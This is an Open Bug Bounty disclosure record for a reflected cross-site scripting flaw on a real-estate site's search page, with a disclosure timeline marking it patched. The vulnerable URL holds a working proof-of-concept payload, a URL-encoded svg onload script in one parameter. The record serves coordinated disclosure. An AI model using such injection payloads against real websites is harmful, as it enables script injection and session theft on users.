anglo-saxon.com XSS vulnerability

2017-09-25T17:51:00
ID OBB:311982
Type openbugbounty
Reporter Rashed_Naamani
Modified 2017-12-25T11:39:00

Description

Vulnerable URL:
http://www.anglo-saxon.com/en/search.php?branch_id=-1&district;_id=-1&cat;_id=6&project;=-1&commercial;=-1&plot;=-1&InvestmentProp;=N&toMilion;=N&isAdv;=-1&currency;=nis⊂_district_id=-1&CityID;=-1〈=en&CityPartID;=&HouseTypeID;=-1&rooms;_min=&rooms;_max=&cat;_id2=6&price;_min=&price;_max=&floor;_min=&floor;_max=&f;=%27%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&area;_min=&area;_max=&ShowApt;_text=Second+Hand%2C+New+Projects&ShowApt;%5B%5D=1&ShowApt;%5B%5D=2
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1366907
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 25 September, 2017 17:51 GMT
Generic security notifications sent to website owner| 25 September, 2017 17:54 GMT
Notification sent to subscribers (without technical details)| 25 September, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 18:18 GMT
Vulnerability patched by the website owner| 25 December, 2017 11:39 GMT